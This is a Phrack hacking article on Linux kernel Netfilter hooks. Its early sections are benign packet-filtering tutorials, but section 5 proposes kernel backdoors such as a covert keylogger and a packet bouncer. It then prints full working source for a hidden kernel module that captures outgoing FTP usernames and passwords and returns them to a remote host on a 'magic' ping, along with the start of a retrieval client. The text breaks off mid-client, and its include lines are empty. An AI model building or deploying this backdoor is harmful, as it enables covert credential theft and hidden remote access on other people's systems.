==Phrack Inc.== Volume 0x0b, Issue 0x3d, Phile #0x0d of 0x0f |=------------=[ Hacking the Linux Kernel Network Stack ]=---------------=| |=-----------------------------------------------------------------------=| |=------------------=[ bioforge ]=--------------------=| Table of Contents 1 - Introduction 1.1 - What this document is 1.2 - What this document is not 2 - The various Netfilter hooks and their uses 2.1 - The Linux kernel's handling of packets 2.2 - The Netfilter hooks for IPv4 3 - Registering and unregistering Netfilter hooks 4 - Packet filtering operations with Netfilter 4.1 - A closer look at hook functions 4.2 - Filtering by interface 4.3 - Filtering by address 4.4 - Filtering by TCP port 5 - Other possibilities for Netfilter hooks 5.1 - Hidden backdoor daemons 5.2 - Kernel based FTP password sniffer 5.2.1 - The code... nfsniff.c 5.2.2 - getpass.c 6 - Hiding network traffic from Libpcap 6.1 - SOCK_PACKET, SOCK_RAW and Libpcap 6.2 - Wrapping the cloak around the dagger 7 - Conclusion A - Light-Weight Fire Wall A.1 - Overview A.2 - The source... lwfw.c A.3 - lwfw.h B - Code for section 6 --[ 1 - Introduction This article describes how quirks (not necessarily weaknesses) in the Linux network stack can be used for various purposes, nefarious or otherw- ise. Presented here will be a discussion on using seemingly legitimate Netfilter hooks for backdoor communications and also a technique to hide such traffic from a Libpcap based sniffer running on the local machine. Netfilter is a subsystem in the Linux 2.4 kernel. Netfilter makes such network tricks as packet filtering, network address translation (NAT) and connection tracking possible through the use of various hooks in the kernel's network code. These hooks are places that kernel code, either statically built or in the form of a loadable module, can register functions to be called for specific network events. An example of such an event is the reception of a packet. ----[ 1.1 - What this document is This document discusses how a module writer can make use of the Netfilter hooks for whatever purposes and also how network traffic can be hidden from a Libpcap application. Although Linux 2.4 supports hooks for IPv4, IPv6 and DECnet, only IPv4 will be discussed in this document. However, most of the IPv4 content can be applied to the other protocols. As an aide to teaching, a working kernel module that provides basic packet filtering is provided in Appendix A. Any development/experimentation done for this document was done on an Intel machine running Linux 2.4.5. Testing the behaviour of Netfilter hooks was done using the loopback device, an Ethernet device and a modem Point-to-Point interface. This document is also written for my benefit in an attempt to fully understand Netfilter. I do not guarantee that any code accompanying this document is 100% error free but I have tested all code provided here. I have suffered the kernel faults so hopefully you won't have to. Also, I do not accept any responsibility for damages that may occur through following this document. It is expected that the reader be comfortable with the C programming language and have some experience with Loadable Kernel Modules. If I have made a mistake in something presented here then please let me know. I am also open to suggestions on either improving this document or other nifty Netfilter tricks in general. ----[ 1.2 - What this document is not This document is not a complete ins-and-outs reference for Netfilter. It is also *not* a reference for the iptables command. If you want to learn more about the iptables command, consult the man pages. So let's get started with an introduction to using Netfilter... --[ 2 - The various Netfilter hooks and their uses ----[ 2.1 - The Linux kernel's handling of packets As much as I would love to go into the gory details of Linux's handling of packets and the events preceeding and following each Netfilter hook, I won't. The simple reason is that Harald Welte has already written a nice document on the subject, his Journey of a Packet Through the Linux 2.4 Network Stack document. To learn more on Linux's handling of packets, I strongly suggest that you read this document as well. For now, just understand that as a packet moves through the Linux kernel's network stack it crosses several hook locations where packets can be analysed and kept or discarded. These are the Netfilter hooks. ------[ 2.2 The Netfilter hooks for IPv4 Netfilter defines five hooks for IPv4. The declaration of the symbols for these can be found in linux/netfilter_ipv4.h. These hooks are displayed in the table below: Table 1: Available IPv4 hooks Hook Called NF_IP_PRE_ROUTING After sanity checks, before routing decisions. NF_IP_LOCAL_IN After routing decisions if packet is for this host. NF_IP_FORWARD If the packet is destined for another interface. NF_IP_LOCAL_OUT For packets coming from local processes on their way out. NF_IP_POST_ROUTING Just before outbound packets "hit the wire". The NF_IP_PRE_ROUTING hook is called as the first hook after a packet has been received. This is the hook that the module presented later will utilise. Yes the other hooks are very useful as well, but for now we will focus only on NF_IP_PRE_ROUTING. After hook functions have done whatever processing they need to do with a packet they must return one of the predefined Netfilter return codes. These codes are: Table 2: Netfilter return codes Return Code Meaning NF_DROP Discard the packet. NF_ACCEPT Keep the packet. NF_STOLEN Forget about the packet. NF_QUEUE Queue packet for userspace. NF_REPEAT Call this hook function again. The NF_DROP return code means that this packet should be dropped completely and any resources allocated for it should be released. NF_ACCEPT tells Netfilter that so far the packet is still acceptable and that it should move to the next stage of the network stack. NF_STOLEN is an interesting one because it tells Netfilter to "forget" about the packet. What this tells Netfilter is that the hook function will take processing of this packet from here and that Netfilter should drop all processing of it. This does not mean, however, that resources for the packet are released. The packet and it's respective sk_buff structure are still valid, it's just that the hook function has taken ownership of the packet away from Netfilter. Unfortunately I'm not exactly clear on what NF_QUEUE really does so for now I won't discuss it. The last return value, NF_REPEAT requests that Netfilter calls the hook function again. Obviously one must be careful using NF_REPEAT so as to avoid an endless loop. --[ 3 - Registering and unregistering Netfilter hooks Registration of a hook function is a very simple process that revolves around the nf_hook_ops structure, defined in linux/netfilter.h. The definition of this structure is as follows: struct nf_hook_ops { struct list_head list; /* User fills in from here down. */ nf_hookfn *hook; int pf; int hooknum; /* Hooks are ordered in ascending priority. */ int priority; }; The list member of this structure is used to maintain the lists of Netfilter hooks and has no importance for hook registration as far as users are concerned. hook is a pointer to a nf_hookfn function. This is the function that will be called for the hook. nf_hookfn is defined in linux/netfilter.h as well. The pf field specifies a protocol family. Valid protocol families are available from linux/socket.h but for IPv4 we want to use PF_INET. The hooknum field specifies the particular hook to install this function for and is one of the values listed in table 1. Finally, the priority field specifies where in the order of execution this hook function should be placed. For IPv4, acceptable values are defined in linux/netfilter_ipv4.h in the nf_ip_hook_priorities enumeration. For the purposes of demonstration modules we will be using NF_IP_PRI_FIRST. Registration of a Netfilter hook requires using a nf_hook_ops structure with the nf_register_hook() function. nf_register_hook() takes the address of an nf_hook_ops structure and returns an integer value. However, if you actually look at the code for the nf_register_hook() function in net/core/netfilter.c, you will notice that it only ever returns a value of zero. Provided below is example code that simply registers a function that will drop all packets that come in. This code will also show how the Netfilter return values are interpreted. Listing 1. Registration of a Netfilter hook /* Sample code to install a Netfilter hook function that will * drop all incoming packets. */ #define __KERNEL__ #define MODULE #include #include #include #include /* This is the structure we shall use to register our function */ static struct nf_hook_ops nfho; /* This is the hook function itself */ unsigned int hook_func(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)) { return NF_DROP; /* Drop ALL packets */ } /* Initialisation routine */ int init_module() { /* Fill in our hook structure */ nfho.hook = hook_func; /* Handler function */ nfho.hooknum = NF_IP_PRE_ROUTING; /* First hook for IPv4 */ nfho.pf = PF_INET; nfho.priority = NF_IP_PRI_FIRST; /* Make our function first */ nf_register_hook(&nfho); return 0; } /* Cleanup routine */ void cleanup_module() { nf_unregister_hook(&nfho); } That's all there is to it. From the code given in listing 1 you can see that unregistering a Netfilter hook is a simple matter of calling nf_unregister_hook() with the address of the same structure you used to register the hook. --[ 4 - Basic packet filtering techniques with Netfilter ----[ 4.1 - A closer look at hook functions Now its time to start looking at what data gets passed into hook functions and how that data an be used to make filtering decisions. So let's look more closely at the prototype for nf_hookfn functions. The prototype is given in linux/netfilter.h as follows: typedef unsigned int nf_hookfn(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)); The first argument to nf_hookfn functions is a value specifying one of the hook types given in table 1. The second argument is more interesting. It is a pointer to a pointer to a sk_buff structure, the structure used by the network stack to describe packets. This structure is defined in linux/skbuff.h and due to its size, I shall only highlight some of it's more interesting fields here. Possibly the most useful fields out of sk_buff structures are the three unions that describe the transport header (ie. UDP, TCP, ICMP, SPX), the network header (ie. IPv4/6, IPX, RAW) and the link layer header (Ethernet or RAW). The names of these unions are h, nh and mac respectively. These unions contain several structures, depending on what protocols are in use in a particular packet. One should note that the transport header and network header may very well point to the same location in memory. This is the case for TCP packets where h and nh are both considered as pointers to IP header structures. This means that attempting to get a value from h->th thinking it's pointing to the TCP header will result in false results because h->th will actually be pointing to the IP header, just like nh->iph. Other fields of immediate interest are the len and data fields. len specifies the total length of the packet data beginning at data. So now we know how to access individual protocol headers and the packet data itself from a sk_buff structure. What other interesting bits of information are available to Netfilter hook functions? The two arguments that come after skb are pointers to net_device structures. net_device structures are what the Linux kernel uses to describe network interfaces of all sorts. The first of these structures, in, is used to describe the interface the packet arrived on. Not surprisingly, the out structure describes the interface the packet is leaving on. It is important to realise that usually only one of these structures will be provided. For instance, in will only be provided for the NF_IP_PRE_ROUTING and NF_IP_LOCAL_IN hooks. out will only be provided for the NF_IP_LOCAL_OUT and NF_IP_POST_ROUTING hooks. At this stage I haven't tested which of these structures are available for the NF_IP_FORWARD hook but if you make sure the pointers are non-NULL before attempting to dereference them you should be fine. Finally, the last item passed into a hook function is a function pointer called okfn that takes a sk_buff structure as its only argument and returns an integer. I'm not too sure on what this function does. Looking in net/core/netfilter.c there are two places where this okfn is called. These two places are in the functions nf_hook_slow() and nf_reinject() where at a certain place this function is called on a return value of NF_ACCEPT from a Netfilter hook. If anybody has more information on okfn please let me know. Now that we've looked at the most interesting and useful bits of informa- tion that our hook functions receive, it's time to look at how we can use that information to filter packets in a variety of ways. ----[ 4.2 - Filtering by interface This would have to be the simplest filtering technique we can do. Remember those net_device structures our hook function received? Using the name field from the relevant net_device structure allows us to drop packets depending on their source interface or destination interface. To drop all packets that arrive on interface eth0 all one has to do is compare the value of in->name with "eth0". If the names match then the hook function simply returns NF_DROP and the packet is destroyed. It's as easy as that. Sample code to do this is provided in listing 2 below. Note that the Light-Weight FireWall module will provide simple examples of all the filtering methods presented here. It also includes an IOCTL interface and application to change its behaviour dynamically. Listing 2. Filtering packets based on their source interface /* Sample code to install a Netfilter hook function that will * drop all incoming packets on an interface we specify */ #define __KERNEL__ #define MODULE #include #include #include #include #include /* This is the structure we shall use to register our function */ static struct nf_hook_ops nfho; /* Name of the interface we want to drop packets from */ static char *drop_if = "lo"; /* This is the hook function itself */ unsigned int hook_func(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)) { if (strcmp(in->name, drop_if) == 0) { printk("Dropped packet on %s...\n", drop_if); return NF_DROP; } else { return NF_ACCEPT; } } /* Initialisation routine */ int init_module() { /* Fill in our hook structure */ nfho.hook = hook_func; /* Handler function */ nfho.hooknum = NF_IP_PRE_ROUTING; /* First hook for IPv4 */ nfho.pf = PF_INET; nfho.priority = NF_IP_PRI_FIRST; /* Make our function first */ nf_register_hook(&nfho); return 0; } /* Cleanup routine */ void cleanup_module() { nf_unregister_hook(&nfho); } Now isn't that simple? Next, let's have a look at filtering based on IP addresses. ----[ 4.3 - Filtering by address As with filtering packets by their interface, filtering packets by their source or destination IP address is very simple. This time we are interested in the sk_buff structure. Now remember that the skb argument is a pointer to a pointer to a sk_buff structure. To avoid running into problems it is good practice to declare a seperate pointer to a sk_buff structure and assign the value pointed to by skb to this newly declared pointer. Like so: struct sk_buff *sb = *skb; /* Remove 1 level of indirection* / Now you only have to dereference once to access items in the structure. Obtaining the IP header for a packet is done using the network layer header from the the sk_buff structure. This header is contained in a union and can be accessed as sk_buff->nh.iph. The function in listing 3 demonstrates how to check the source IP address of a received packet against an address to deny when given a sk_buff for the packet. This code has been pulled directly from LWFW. The only difference is that the update of LWFW statistics has been removed. Listing 3. Checking source IP of a received packet unsigned char *deny_ip = "\x7f\x00\x00\x01"; /* 127.0.0.1 */ ... static int check_ip_packet(struct sk_buff *skb) { /* We don't want any NULL pointers in the chain to * the IP header. */ if (!skb )return NF_ACCEPT; if (!(skb->nh.iph)) return NF_ACCEPT; if (skb->nh.iph->saddr == *(unsigned int *)deny_ip) { return NF_DROP; } return NF_ACCEPT; } Now if the source address matches the address we want to drop packets from then the packet is dropped. For this function to work as presented the value of deny_ip should be stored in Network Byte Order (Big-endian, opposite of Intel). Although it's unlikely that this function will be called with a NULL pointer for it's argument, it never hurts to be a little paranoid. Of course if an error does occur then the function will return NF_ACCEPT so that Netfilter can continue processing the packet. Listing 4 presents the simple module used to demonstrate interface based filtering changed so that it drops packets that match a particular IP address. Listing 4. Filtering packets based on their source address /* Sample code to install a Netfilter hook function that will * drop all incoming packets from an IP address we specify */ #define __KERNEL__ #define MODULE #include #include #include #include /* For IP header */ #include #include /* This is the structure we shall use to register our function */ static struct nf_hook_ops nfho; /* IP address we want to drop packets from, in NB order */ static unsigned char *drop_ip = "\x7f\x00\x00\x01"; /* This is the hook function itself */ unsigned int hook_func(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)) { struct sk_buff *sb = *skb; if (sb->nh.iph->saddr == drop_ip) { printk("Dropped packet from... %d.%d.%d.%d\n", *drop_ip, *(drop_ip + 1), *(drop_ip + 2), *(drop_ip + 3)); return NF_DROP; } else { return NF_ACCEPT; } } /* Initialisation routine */ int init_module() { /* Fill in our hook structure */ nfho.hook = hook_func; /* Handler function */ nfho.hooknum = NF_IP_PRE_ROUTING; /* First for IPv4 */ nfho.pf = PF_INET; nfho.priority = NF_IP_PRI_FIRST; /* Make our func first */ nf_register_hook(&nfho); return 0; } /* Cleanup routine */ void cleanup_module() { nf_unregister_hook(&nfho); } ----[ 4.4 - Filtering by TCP port Another simple rule to implement is the filtering of packets based on their TCP destination port. This is only a bit more fiddly than checking IP addresses because we need to create a pointer to the TCP header ourselves. Remember what was discussed earlier about transport headers and network headers? Getting a pointer to the TCP header is a simple matter of allocating a pointer to a struct tcphdr (define in linux/tcp.h) and pointing after the IP header in our packet data. Perhaps an example would help. Listing 5 presents code to check if the destination TCP port of a packet matches some port we want to drop all packets for. As with listing 3, this was taken from LWFW. Listing 5. Checking the TCP destination port of a received packet unsigned char *deny_port = "\x00\x19"; /* port 25 */ ... static int check_tcp_packet(struct sk_buff *skb) { struct tcphdr *thead; /* We don't want any NULL pointers in the chain * to the IP header. */ if (!skb ) return NF_ACCEPT; if (!(skb->nh.iph)) return NF_ACCEPT; /* Be sure this is a TCP packet first */ if (skb->nh.iph->protocol != IPPROTO_TCP) { return NF_ACCEPT; } thead = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4)); /* Now check the destination port */ if ((thead->dest) == *(unsigned short *)deny_port) { return NF_DROP; } return NF_ACCEPT; } Very simple indeed. Don't forget that for this function to work deny_port should be in network byte order. That's it for packet filtering basics, you should have a fair understanding of how to get to the information you want for a specific packet. Now it's time to move onto more interesting stuff. --[ 5 - Other possibilities for Netfilter hooks Here I'll make some proposals for other cool stuff to do with Netfilter hooks. Section 5.1 will simply provide food for thought, while section 5.2 shall discuss and provide working code for a kernel based FTP password sniffer with remote password retrieval that really does work. It fact it works so well it scares me, and I wrote it. ----[ 5.1 - Hidden backdoor daemons Kernel module programming would have to be one of the most interesting areas of development for Linux. Writing code in the kernel means you are writing code in a place where you are limited only by your imagination. From a malicous point of view you can hide files, processes, and do all sorts of cool things that any rootkit worth its salt is capable of. Then from a not-so-malicious point of view (yes people with this point of view do exist) you can hide files, processes and do all sorts of cool things. The kernel really is a fascinating place. Now with all the power made available to a kernel level programmer, there are a lot of possibilities. Possibly one of the most interesting (and scary for system administrators) is the possibility of backdoors built right into the kernel. Afterall, if a backdoor doesn't run as a process then how do you know it's running? Of course there are ways of making your kernel cough-up such backdoors, but they are by no means as easy and simple as running ps. Now the idea of putting backdoor code into a kernel is not new. What I'm proposing here, however, is placing simple network services as kernel backdoors using, you guessed it, Netfilter hooks. If you have the necessary skills and willingness to crash your kernel in the name of experimentation, then you can construct simple but useful network services located entirely in the kernel and accessible remotely. Basically a Netfilter hook could watch incoming packets for a "magic" packet and when that magic packet is received, do something special. Results can then be sent from the Netfilter hook and the hook function can return NF_STOLEN so that the received "magic" packet goes no further. Note however, that when sending in such a fassion, outgoing packets will still be visible on the outbound Netfilter hooks. Therefore userspace is totally unaware that the magic packet ever arrived, but they can still see whatever you send out. Beware! Just because a sniffer on a compromised host can't see the packet, doesn't mean that a sniffer on an intermediate host can't see the packet. kossak and lifeline wrote an excellent article for Phrack describing how such things could be done by registering packet type handlers. Although this document deals with Netfilter hooks I still suggest reading their article (Issue 55, file 12) as it is a very interesting read with some very interesting ideas being presented. So what kind of work could a backdoor Netfilter hook do? Well, here are some suggestions: -- Remote access key-logger. Module logs keystrokes and results are sent to a remote host when that host sends a PING request. So a stream of keystroke information could be made to look like a steady (don't flood) stream of PING replies. Of course one would want to implement a simple encryption so that ASCII keys don't show themselves immediately and some alert system administrator goes "Hang on. I typed that over my SSH session before! Oh $%@T%&!". -- Various simple administration tasks such as getting lists of who is currently logged onto the machine or obtaining information about open network connections. -- Not really a backdoor as such, but a module that sits on a network perimeter and blocks any traffic suspected to come from trojans, ICMP covert channels or file sharing tools like KaZaa. -- File transfer "server". I have implemented this idea recently. The resulting LKM is hours of fun :). -- Packet bouncer. Redirects packets aimed at a special port on the backdoored host to another IP host and port and sends packets from that host back to the initiator. No process being spawned and best of all, no network socket being opened. -- Packet bouncer as described above used to communicate with critical systems on a network in a semi-covert manner. Eg. configuring routers and such. -- FTP/POP3/Telnet password sniffer. Sniff outgoing passwords and save the information until a magic packet comes in asking for it. Well that's a short list of ideas. The last one will actually be discussed in more detail in the next section as it provides a nice oppurtunity to look at some more functions internal to the kernel's network code. ----[ 5.2 - Kernel based FTP password sniffer Presented here is a simple proof-of-concept module that acts as a Netfilter backdoor. This module will sniff outgoing FTP packets looking for a USER and PASS command pair for an FTP server. When a pair is found the module will then wait for a "magic" ICMP ECHO (Ping) packet big enough to return the server's IP address and the username and password. Also provided is a quick hack that sends a magic packet, gets a reply then prints the returned information. Once a username/password pair has been read from the module it will then look for the next pair. Note that only one pair will be stored by the module at one time. Now that a brief overview has been provided, it's time to present a more detailed look at how the module does its thing. When loaded, the module's init_module() function simply registers two Netfilter hooks. The first one is used to watch incoming traffic (on NF_IP_PRE_ROUTING) in an attempt to find a "magic" ICMP packet. The next one is used to watch traffic leaving the machine (on NF_IP_POST_ROUTING) the module is installed on. This is where the search and capture of FTP USER and PASS packets happens. The cleanup_module() procedure simply unregisters these two hooks. watch_out() is the function used to hook NF_IP_POST_ROUTING. Looking at this function you can see that it is very simple in operation. When a packet enters the function it is run through various checks to be sure it's an FTP packet. If it's not then a value of NF_ACCEPT is returned immediately. If it is an FTP packet then the module checks to be sure that it doesn't already have a username and password pair already queued. If it does (as signalled by have_pair being non-zero) then NF_ACCEPT is returned and the packet can finally leave the system. Otherwise, the check_ftp() procedure is called. This is where extraction of passwords actually takes place. If no previous packets have been received then the target_ip and target_port variables should be cleared. check_ftp() starts by looking for either "USER", "PASS" or "QUIT" at the beginning of the packet. Note that PASS commands will not be processed until a USER command has been processed. This prevents deadlock that occurs if for some reason a PASS command is received first and the connection breaks before USER arrives. Also, if a QUIT command arrives and only a username has been captured then things are reset so sniffing can start over on a new connection. When a USER or PASS command arrives, if the necessary sanity checks are passed then the argument to the command is copied. Just before check_ftp() finishes under normal operations, it checks to see if it now has a valid username and password string. If it does then have_pair is set and no more usernames or passwords will be grabbed until the current pair is retrieved. So far you have seen how this module installs itself and begins looking for usernames and passwords to log. Now you shall see what happens when the specially formatted "magic" packet arrives. Pay particular attention here because this is where the most problems arose during development. 16 kernel faults if I remember correctly :). When packets come into the machine with this module installed, watch_in() checks each one to see if it is a magic packet. If it does not pass the necessary requirements to be considered magic, then the packet is ignored by watch_in() who simply returns NF_ACCEPT. Notice how one of the criteria for magic packets is that they have enough room to hold the IP address and username and password strings. This is done to make sending the reply easier. A fresh sk_buff could have been allocated, but getting all of the necessary fields right can be difficult and you have to get them right! So instead of creating a new structure for our reply packet, we simply tweak the request packet's structure. To return the packet successfully, several changes need to be made. Firstly, the IP addresses are swapped around and the packet type field of the sk_buff structure (pkt_type) is changed to PACKET_OUTGOING which is defined in linux/if_packet.h. The next thing to take care of is making sure any link layer headers are included. The data field of our received packet's sk_buff points after the link layer header and it is the data field that points to the beginning of packet data to be transmitted. So for interfaces that require the link layer header (Ethernet and Loopback Point-to-Point is raw) we point the data field to the mac.ethernet or mac.raw structures. To determine what type of interface this packet came in on, you can check the value of sb->dev->type where sb is a pointer to a sk_buff structure. Valid values for this field can be found in linux/if_arp.h but the most useful are given below in table 3. Table 3: Common values for interface types Type Code Interface Type ARPHRD_ETHER Ethernet ARPHRD_LOOPBACK Loopback device ARPHRD_PPP Point-to-point (eg. dialup) The last thing to be done is actually copy the data we want to send in our reply. It's now time to send the packet. The dev_queue_xmit() function takes a pointer to a sk_buff structure as it's only argument and returns a negative errno code on a nice failure. What do I mean by nice failure? Well, if you give dev_queue_xmit() a badly constructed socket buffer then you will get a not-so-nice failure. One that comes complete with kernel fault and kernel stack dump information. See how failures can be splt into two groups here? Finally, watch_in() returns NF_STOLEN to tell Netfilter to forget it ever saw the packet (bit of a Jedi Mind Trick). Do NOT return NF_DROP if you have called dev_queue_xmit()! If you do then you will quickly get a nasty kernel fault. This is because dev_queue_xmit() will free the passed in socket buffer and Netfilter will attempt to do the same with an NF_DROPped packet. Well that's enough discussion on the code, it's now time to actually see the code. ------[ 5.2.1 - The code... nfsniff.c <++> nfsniff/nfsniff.c /* Simple proof-of-concept for kernel-based FTP password sniffer. * A captured Username and Password pair are sent to a remote host * when that host sends a specially formatted ICMP packet. Here we * shall use an ICMP_ECHO packet whose code field is set to 0x5B * *AND* the packet has enough * space after the headers to fit a 4-byte IP address and the * username and password fields which are a max. of 15 characters * each plus a NULL byte. So a total ICMP payload size of 36 bytes. */ /* Written by bioforge, March 2003 */ #define MODULE #define __KERNEL__ #include #include #include #include #include #include #include #include #include #include #include #include #include #define MAGIC_CODE 0x5B #define REPLY_SIZE 36 #define ICMP_PAYLOAD_SIZE (htons(sb->nh.iph->tot_len) \ - sizeof(struct iphdr) \ - sizeof(struct icmphdr)) /* THESE values are used to keep the USERname and PASSword until * they are queried. Only one USER/PASS pair will be held at one * time and will be cleared once queried. */ static char *username = NULL; static char *password = NULL; static int have_pair = 0; /* Marks if we already have a pair */ /* Tracking information. Only log USER and PASS commands that go to the * same IP address and TCP port. */ static unsigned int target_ip = 0; static unsigned short target_port = 0; /* Used to describe our Netfilter hooks */ struct nf_hook_ops pre_hook; /* Incoming */ struct nf_hook_ops post_hook; /* Outgoing */ /* Function that looks at an sk_buff that is known to be an FTP packet. * Looks for the USER and PASS fields and makes sure they both come from * the one host as indicated in the target_xxx fields */ static void check_ftp(struct sk_buff *skb) { struct tcphdr *tcp; char *data; int len = 0; int i = 0; tcp = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4)); data = (char *)((int)tcp + (int)(tcp->doff * 4)); /* Now, if we have a username already, then we have a target_ip. * Make sure that this packet is destined for the same host. */ if (username) if (skb->nh.iph->daddr != target_ip || tcp->source != target_port) return; /* Now try to see if this is a USER or PASS packet */ if (strncmp(data, "USER ", 5) == 0) { /* Username */ data += 5; if (username) return; while (*(data + i) != '\r' && *(data + i) != '\n' && *(data + i) != '\0' && i < 15) { len++; i++; } if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL) return; memset(username, 0x00, len + 2); memcpy(username, data, len); *(username + len) = '\0'; /* NULL terminate */ } else if (strncmp(data, "PASS ", 5) == 0) { /* Password */ data += 5; /* If a username hasn't been logged yet then don't try logging * a password */ if (username == NULL) return; if (password) return; while (*(data + i) != '\r' && *(data + i) != '\n' && *(data + i) != '\0' && i < 15) { len++; i++; } if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL) return; memset(password, 0x00, len + 2); memcpy(password, data, len); *(password + len) = '\0'; /* NULL terminate */ } else if (strncmp(data, "QUIT", 4) == 0) { /* Quit command received. If we have a username but no password, * clear the username and reset everything */ if (have_pair) return; if (username && !password) { kfree(username); username = NULL; target_port = target_ip = 0; have_pair = 0; return; } } else { return; } if (!target_ip) target_ip = skb->nh.iph->daddr; if (!target_port) target_port = tcp->source; if (username && password) have_pair++; /* Have a pair. Ignore others until * this pair has been read. */ // if (have_pair) // printk("Have password pair! U: %s P: %s\n", username, password); } /* Function called as the POST_ROUTING (last) hook. It will check for * FTP traffic then search that traffic for USER and PASS commands. */ static unsigned int watch_out(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)) { struct sk_buff *sb = *skb; struct tcphdr *tcp; /* Make sure this is a TCP packet first */ if (sb->nh.iph->protocol != IPPROTO_TCP) return NF_ACCEPT; /* Nope, not TCP */ tcp = (struct tcphdr *)((sb->data) + (sb->nh.iph->ihl * 4)); /* Now check to see if it's an FTP packet */ if (tcp->dest != htons(21)) return NF_ACCEPT; /* Nope, not FTP */ /* Parse the FTP packet for relevant information if we don't already * have a username and password pair. */ if (!have_pair) check_ftp(sb); /* We are finished with the packet, let it go on its way */ return NF_ACCEPT; } /* Procedure that watches incoming ICMP traffic for the "Magic" packet. * When that is received, we tweak the skb structure to send a reply * back to the requesting host and tell Netfilter that we stole the * packet. */ static unsigned int watch_in(unsigned int hooknum, struct sk_buff **skb, const struct net_device *in, const struct net_device *out, int (*okfn)(struct sk_buff *)) { struct sk_buff *sb = *skb; struct icmphdr *icmp; char *cp_data; /* Where we copy data to in reply */ unsigned int taddr; /* Temporary IP holder */ /* Do we even have a username/password pair to report yet? */ if (!have_pair) return NF_ACCEPT; /* Is this an ICMP packet? */ if (sb->nh.iph->protocol != IPPROTO_ICMP) return NF_ACCEPT; icmp = (struct icmphdr *)(sb->data + sb->nh.iph->ihl * 4); /* Is it the MAGIC packet? */ if (icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO || ICMP_PAYLOAD_SIZE < REPLY_SIZE) { return NF_ACCEPT; } /* Okay, matches our checks for "Magicness", now we fiddle with * the sk_buff to insert the IP address, and username/password pair, * swap IP source and destination addresses and ethernet addresses * if necessary and then transmit the packet from here and tell * Netfilter we stole it. Phew... */ taddr = sb->nh.iph->saddr; sb->nh.iph->saddr = sb->nh.iph->daddr; sb->nh.iph->daddr = taddr; sb->pkt_type = PACKET_OUTGOING; switch (sb->dev->type) { case ARPHRD_PPP: /* No fiddling needs doing */ break; case ARPHRD_LOOPBACK: case ARPHRD_ETHER: { unsigned char t_hwaddr[ETH_ALEN]; /* Move the data pointer to point to the link layer header */ sb->data = (unsigned char *)sb->mac.ethernet; sb->len += ETH_HLEN; //sizeof(sb->mac.ethernet); memcpy(t_hwaddr, (sb->mac.ethernet->h_dest), ETH_ALEN); memcpy((sb->mac.ethernet->h_dest), (sb->mac.ethernet->h_source), ETH_ALEN); memcpy((sb->mac.ethernet->h_source), t_hwaddr, ETH_ALEN); break; } }; /* Now copy the IP address, then Username, then password into packet */ cp_data = (char *)((char *)icmp + sizeof(struct icmphdr)); memcpy(cp_data, &target_ip, 4); if (username) memcpy(cp_data + 4, username, 16); if (password) memcpy(cp_data + 20, password, 16); /* This is where things will die if they are going to. * Fingers crossed... */ dev_queue_xmit(sb); /* Now free the saved username and password and reset have_pair */ kfree(username); kfree(password); username = password = NULL; have_pair = 0; target_port = target_ip = 0; // printk("Password retrieved\n"); return NF_STOLEN; } int init_module() { pre_hook.hook = watch_in; pre_hook.pf = PF_INET; pre_hook.priority = NF_IP_PRI_FIRST; pre_hook.hooknum = NF_IP_PRE_ROUTING; post_hook.hook = watch_out; post_hook.pf = PF_INET; post_hook.priority = NF_IP_PRI_FIRST; post_hook.hooknum = NF_IP_POST_ROUTING; nf_register_hook(&pre_hook); nf_register_hook(&post_hook); return 0; } void cleanup_module() { nf_unregister_hook(&post_hook); nf_unregister_hook(&pre_hook); if (password) kfree(password); if (username) kfree(username); } <--> ------[ 5.2.2 - getpass.c <++> nfsniff/getpass.c /* getpass.c - simple utility to get username/password pair from * the Netfilter backdoor FTP sniffer. Very kludgy, but effective. * Mostly stripped from my source for InfoPig. * * Written by bioforge - March 2003 */ #include #include #include #include #include #include #include #include #include #ifndef __USE_BSD # define __USE_BSD /* We want the proper headers */ #endif # include #include /* Function prototypes */ static unsigned short checksum(int numwords, unsigned short *buff); int main(int argc, char *argv[]) { unsigned char dgram[256]; /* Plenty for a PING datagram */ unsigned char recvbuff[256]; struct ip *iphead = (struct ip *)dgram; struct icmp *icmphead = (struct icmp *)(dgram + sizeof(struct ip)); struct sockaddr_in src; struct sockaddr_in addr; struct in_addr my_addr; struct in_addr serv_addr; socklen_t src_addr_size = sizeof(struct sockaddr_in); int icmp_sock = 0; int one = 1; int *ptr_one = &one; if (argc < 3) { fprintf(stderr, "Usage: %s remoteIP myIP\n", argv[0]); exit(1); } /* Get a socket */ if ((icmp_sock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) { fprintf(stderr, "Couldn't open raw socket! %s\n", strerror(errno)); exit(1); } /* set the HDR_INCL option on the socket */ if(setsockopt(icmp_sock, IPPROTO_IP, IP_HDRINCL, ptr_one, sizeof(one)) < 0) { close(icmp_sock); fprintf(stderr, "Couldn't set HDRINCL option! %s\n", strerror(errno)); exit(1); } addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(argv[1]); my_addr.s_addr = inet_addr(argv[2]); memset(dgram, 0x00, 256); memset(recvbuff, 0x00, 256); /* Fill in the IP fields first */ iphead->ip_hl = 5; iphead->ip_v = 4; iphead->ip_tos = 0; iphead->ip_len = 84; iphead->ip_id = (unsigned short)rand(); iphead->ip_off = 0; iphead->ip_ttl = 128; iphead->ip_p = IPPROTO_ICMP; iphead->ip_sum = 0; iphead->ip_src = my_addr; iphead->ip_dst = addr.sin_addr; /* Now fill in the ICMP fields */ icmphead->icmp_type = ICMP_ECHO; icmphead->icmp_code = 0x5B; icmphead->icmp_cksum = checksum(42, (unsigned short *)icmphead); /* Finally, send the packet */ fprintf(stdout, "Sending request...\n"); if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { fprintf(stderr, "\nFailed sending request! %s\n", strerror(errno)); return 0; } fprintf(stdout, "Waiting for 